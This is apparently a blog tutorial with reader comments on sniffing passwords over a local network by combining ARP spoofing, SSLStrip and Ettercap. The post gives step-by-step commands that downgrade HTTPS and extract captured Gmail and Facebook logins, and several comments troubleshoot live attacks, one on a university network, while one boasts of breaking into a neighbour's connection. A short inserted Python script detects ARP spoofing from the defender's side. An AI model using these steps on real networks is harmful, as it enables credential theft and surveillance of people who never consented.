
If you don't have any of these, follow the links and set up your system before continuing.

Notice: This is purely for educational value; do not attempt this on a network you do not PERSONALLY own. Doing this on a public or private network without authorization is illegal, and you will probably get caught.

Okay, so what we're doing today is using a few programs to sniff passwords over a network and redirect secure HTTPS connections to non-secure HTTP connections to help us get even more passwords.
I've successfully gotten passwords and user names from Gmail, Facebook, Ureddit, Reddit, and Youtube; but all sites should work.

Let's begin:

First, we need to figure out the IP address of the user we want to sniff, and the gateway IP (usually 192.168.0.1 or 192.168.x.1 depending on the network).

You should have SOME experience with finding users on a network, but if you don't, you can use a program that comes on Backtrack 5 called "Kismet" to identify users, or use the program "Nmap" (short for network mapper).

The simplest Nmap command to run would be "nmap -sn 192.168.0.0/24", adjusted to your own IP range and subnet.

The "-sn" option tells Nmap not to port scan and to do host discovery only. This option is called the Ping Scan option, since it is essentially a large ping sweep over the subnet.

The first one (lowest number at the end, such as 192.168.0.1) is the gateway, so remember what number that is.

You can figure out what yours is by doing our good old friend "ifconfig" and looking at your IP address. You can then figure out which ones are other computers and choose which one you wish to directly sniff.

What we have to do is flip our computer into "forwarding" mode which allows us to forward packets along to other computers. Issue the command: "echo 1 > /proc/sys/net/ipv4/ip_forward" which places "1" (true or allow in computer language) into the file "ip_forward" with the ">" operator.

I'm using the port 666 because it's easy to remember, but you can use any port that isn't already being used. You probably already know that port 80 is for HTTP traffic, so you can understand why the "destination port" is that. I'll explain the rest later, so don't worry if it doesn't make sense, just check back later!

Important note here: run the command "cat /etc/etter.conf |grep iptables" and if your output is:

Now we have to run SSLStrip to strip any HTTPS connections and redirect them to HTTP (unsecure) connections. The name SSLStrip is quite perfect, eh?

To start SSLStrip on my computer, I have to navigate to the SSLStrip folder with the command "cd /pentest/web/sslstrip" first, then issue the command "python sslstrip.py -l 666" to run the program.
This runs the Python script file that starts the program. Python is a scripting language like Perl or Ruby, and we will learn more about it in the future. If you're interested in netsec and want to learn a programming language on your own, definitely check out Python and Perl to start.

Don't close this terminal.

We have to ARP spoof or ARP poison our target computer. We learned about ARP here, and if you haven't read it already, go do so before continuing.
Open a new terminal now for our ARP spoofing, and run the command:
"arpspoof -i [your interface] -t [target computer ip address such as 192.168.0.111] [gateway ip address such as 192.168.0.1]"

If you want to ARP spoof the ENTIRE network, issue the command "arpspoof -i [interface] [gateway IP]".
Thanks to Volvox for the above hint, but watch out: if your computer can't handle all the redirecting the network requires, it will DoS (denial of service) the network and exhaust your computer's resources.

Don't close this terminal.

Now open another terminal and let's start Ettercap! We will be using it in text mode today because I personally like it better (it feels less script-kiddie like and easier to navigate/issue commands).

Run the command "ettercap -m [any_file_name.txt] -Tq -i [interface]" and a text interface will come up telling you a bunch of information (I'll post what mine looks like soon).

I forgot to mention: in the Ettercap text interface, you have to press the space bar to show the packets coming in. Do this, and if there's any browsing on the target computer, you should see the packets start appearing rapidly across your screen.
Hopefully you're doing this legally on your own network so you can test this out. Open up a browser on your target computer, go to mail.google.com and try to log in. It should redirect you to the HTTP version (but to a normal person, this won't be noticeable). Log in with your credentials and you should see something pop up in Ettercap that looks like a packet from Gmail. If it's scrolling too fast (which happens), don't worry, I'll show you how to open up your file.

Open a new terminal while Ettercap is running (don't close it!) and issue the command "cat [your_file_name.txt]"
Now you can see all the information that was printed at first, and at the bottom there should be some sniffed data if all went well (I'll post a screen-shot later).
Let's clean this up a bit. Issue the command "cat [your_file_name.txt] |grep USER |cut -d" " -f3-12"
The quotation marks after the d should be normal, but of course the ones surrounding the entire command are not.
You should see your data cleaned up quite a bit. I'll run through what that command did later, but I hope you understand some of this for now.
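
From the defender's side, the ARP spoofing step above leaves a visible trace on the target: its ARP cache now maps the gateway IP to the sniffing machine's MAC address. The following is an added example, not part of the original post, that parses "arp -an" output and flags that condition; the sample tables, addresses and function names are constructed for illustration.

```python
import ipaddress
import re
from collections import defaultdict

# Matches `arp -an` lines such as:
#   ? (192.168.0.1) at 00:11:22:33:44:55 [ether] on wlan0
ARP_LINE = re.compile(
    r"\((?P<ip>\d{1,3}(?:\.\d{1,3}){3})\)\s+at\s+"
    r"(?P<mac>(?:[0-9A-Fa-f]{1,2}:){5}[0-9A-Fa-f]{1,2})\b"
)

# Constructed samples: the target's ARP cache before and during the spoof.
BEFORE = """\
? (192.168.0.1) at 0:11:22:33:44:55 [ether] on wlan0
? (192.168.0.105) at aa:bb:cc:dd:ee:01 [ether] on wlan0
? (192.168.0.120) at aa:bb:cc:dd:ee:03 [ether] on wlan0
"""
DURING = """\
? (192.168.0.1) at aa:bb:cc:dd:ee:01 [ether] on wlan0
? (192.168.0.105) at aa:bb:cc:dd:ee:01 [ether] on wlan0
? (192.168.0.120) at aa:bb:cc:dd:ee:03 [ether] on wlan0
? (192.168.0.130) at <incomplete> on wlan0
"""


def normalize_mac(mac):
    """Lower-case and zero-pad each octet (BSD/macOS print 0:11:... style)."""
    return ":".join(octet.zfill(2) for octet in mac.lower().split(":"))


def parse_arp_table(text):
    """Return {ip: mac}. '<incomplete>' entries do not match and are skipped."""
    table = {}
    for line in text.splitlines():
        m = ARP_LINE.search(line)
        if m:
            table[m.group("ip")] = normalize_mac(m.group("mac"))
    return table


def find_arp_anomalies(current, gateway_ip, baseline=None):
    """Flag the two traces a gateway spoof leaves in a host's ARP cache."""
    findings = []
    gw_mac = current.get(gateway_ip)
    # 1. The gateway's MAC differs from a known-good baseline.
    if baseline and gw_mac and baseline.get(gateway_ip) not in (None, gw_mac):
        findings.append(
            ("gateway_mac_changed", gateway_ip, baseline[gateway_ip], gw_mac)
        )
    # 2. The gateway's MAC is also claimed by another IP on the segment.
    #    Proxy ARP or a multi-address router can cause this legitimately,
    #    so treat it as a lead to investigate, not proof.
    by_mac = defaultdict(list)
    for ip, mac in current.items():
        by_mac[mac].append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1 and gateway_ip in ips:
            ordered = sorted(ips, key=ipaddress.ip_address)
            findings.append(("gateway_mac_shared", mac, ordered))
    return findings


if __name__ == "__main__":
    baseline = parse_arp_table(BEFORE)
    for finding in find_arp_anomalies(parse_arp_table(DURING), "192.168.0.1", baseline):
        print(finding)
```

The second IP in a "gateway_mac_shared" finding is the machine to look at first; a static ARP entry for the gateway on the host prevents the cache from being overwritten in this way.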

Do you mean ban using MAC address? Backtrack comes with a little tool called macchanger. If you're cracking wireless or anything it should probably be used just to stop routers from getting your real mac too.

Wow, great information. I'm actually looking into majoring in Computer Science / Computer Security next semester, so I'm hoping that all your information is gonna help me better understand the subject!!! Keep up the good work!!! :D

@Inverse, check out my "learning linux" post, it might help make linux an easier experience.

@TBFB, thanks man, dual-booting is almost always better since it allows you to have access to more options than other people (for instance, Cain&Abel is Windows only).

Sometimes when it rains my connection stops working. I thought it would be a good idea to use my neighbor's connection when that happened. So, I broke into his connection, only to discover he has the same ISP and his connection stops working whenever my connection stops working, haha.

Been doing this for a little while now on my home network. Something else that works for arpspoof is to just hit the entire network! arpspoof -i This will target anyone on the network but note that if your machine cannot handle all the traffic, it will shut down the entire network. People will notice because the route needs to re arp the network topology and does not do it immediately! Good luck!

How is this "sniffing passwords over wifi connection"? This article seems to assume you already have access to the local network. I.e. if it's a wpa2 secured network you wouldn't be able to do any of the above without the pw.

Why I did cat | grep is because I needed to place it into a file and since I'm just starting that was the way I knew it; my BASH scripting post will be updated ;D

@Anon, how else could you sniff packets unless you're connected to the network? It makes no sense to not assume you're already connected. Wpa2 can still be cracked, it just requires a dictionary attack.

@Marshal - Question. I run Ettercap on my laptop, "attacking" my desktop, I was able to see all of the packet information and such on the terminal screen. But when I saved it to a file, here is all I got out of it: http://chigstuff.com/uploads/this.txt

@Chris, you have to follow one of the first command that's flipping your computer into forwarding mode by using the echo command to set forwarding on using the ">" linux command. If you didn't do this you will receive that error. Try doing this then get back to me on if it works. Hope this helps!

Hi. Thanks for the helpful post. I did exactly what you did and was able to retrieve some passwords. However, after a while the terminal running ettercap just stops and shows an error that the iptable must be upgraded. After this I tried to do the steps again but no more passwords seem to come up, only lines that have DHCP then some numbers. I am using backtrack 4 with netbootin from my USB stick.

I successfully tried the ettercap for sniffing passwords on LAN and on WiFi network which don't have a security key. But when I'm in university, here network has WPA/WPA-2 key, although I know the key and I'm connected to the network, ARP Poisoning causes the victims not to be able to open webpages. What I've sorted out using my own router by enabling and disabling WPA/WPA-2 key is that this sniffing has something to do with WPA/WPA-2 key. What I feel is that on a security enabled WiFi network, even though we're connected to it, MITM attacks are not successful. If it is otherwise, please explain...

@Anon, how big is your uni network? I'm assuming it's quite large, so your computer cannot handle all the traffic. Also, I would suggest NOT doing this on a public network, especially your university's, because it's not only against their TOS but illegal and can get you arrested or kicked out of school. My school has very strict policies with MITM attacks and packet sniffing (it's NOT allowed and strictly enforced), so I guess yours would too.

I'm having a problem... when I enter the command to start ettercap there's a message displayed that says 'ssl dissection needs a valid redir_command_on script in the etter.conf file' but I've already removed the "#" from the code. Any help is much appreciated.

Great article. One issue I have is that once I start spoofing, my victim machine can go to HTTP sites just fine. But when I try to go to an SSL site, the browser times out. I double checked that IP forwarding is on, any ideas what I can check next?

And you never even mentioned what type of wireless NIC you used. Shame on you. Wasting everyone's time. Very few wifi nics are capable of arpspoofing. Maybe help out the community by listing the hardware used.

I removed the pingscan script as Nmap does it quite a bit more effectively :] I wrote that script a few years ago when I was quite ignorant of general usage, so I would definitely use Nmap in any situation now.

"my ettercap show this error :SSL dissection needs a valid 'redir_command_on' script in the etter.conf file Privileges dropped to UID 65534 GID 65534..." for this i would recommend the same step of "cat /etc/etter.conf |grep uid " and nano it to change the UID and GID to 0, which mean you will get the root privilege.

HELP!! My ex-boyfriend is in Afghanistan a UK contractor that does secured comms for NATO. No matter what I do he can still get into my accounts and I can't figure out how he is doing it.. I have done everything password resets, imaging my laptop, replacing hardware, changed all my security questions.. This has all been done on my computer at work on a secured network. How is he getting my IP? I desperately want to find out how he is doing this more out of curiosity than anything else. I am beyond pissed off this has been going on for 2 + years.. Any suggestions? I am not as computer savvy as I used to be...

You should try to change all your passwords and security questions through a different location. For example an internet cafe.

Afterwards, do not log in to your accounts from any of your machines before you make sure they are secure and free of malicious code. The easiest way is to format everything but I guess you have stuff you want to keep so let's review another option. (Not to mention he may just be poisoning your network from a nearby remote location)

Remove your HDD and take them to a friend's house. Insert the HDD there and perform an AV scan ( preferably something reputable that has high % detection rate, including rootkits and other fun stuff like that ) on the whole drive. Presumably, this will ensure that your own machine is secure. If he's an expert, there is a possibility he's using some serious FUD stuff but let's hope he's not.

Lastly, you need to ensure there is no unauthorized device connected to your network which may be poisoning your LAN. Easiest way to find out is through the DHCP tables in your router. Routers vary and it may be under a different name so you'll have to play around with the options until you find a list of connected devices. If that fails, you could try and scan your networks for unknown clients ( e.g. not you ) with nmap or an equivalent tool. But, if he does secured comms, that may be fruitless as he may be able to mask his host as a dead one. In which case, I have no solution.

He might have infected your phone in which case I suggest you stop using the installed apps ( uninstall facebook etc ).

Disable wireless connectivity on your router and connect your laptop through a wired connection if you suspect poisoning but cannot find him. ( there are routers which provide safeguards against such attacks but I don't think that's necessary ) Moreover, just to be on the safe side, turn off your laptop wifi ( either a hardware button or in adapter settings, right click -> disable ).

That would be very interesting-- I haven't used SSLStrip in a while and wasn't aware of the Google change. I'm definitely waiting for a fix from someone about this but I'm not sure how often SSLStrip is updated.

I don't seem to be having much luck & I've followed everything step by step. The network connection for the target machine comes to a near stop making it practically impossible to use. sslstrip does not seem to be doing anything as the URL is not changing for https sites.

The Ettercap text file only captures the below information although I can clearly see far more than this when looking at the packets coming in.

The connection on your target machine is becoming very slow because your attacking computer probably can't handle all the traffic it is receiving. What websites have you tried? Some websites only offer HTTPS for certain pages, so that could be your problem.

I've done sniffing over any WiFi connection ever because I don't really know how to do it actually. Really enjoyed learning how to actually accomplish such tricky works through reading such enormous allocation!! Thanks for helpful contribution.

Oh man! This is great stuff this is...!!! Thank you so much for teaching us! This is truly a great introduction. So, by issuing those commands above, you now have full access of all out terminals? LOL >.<
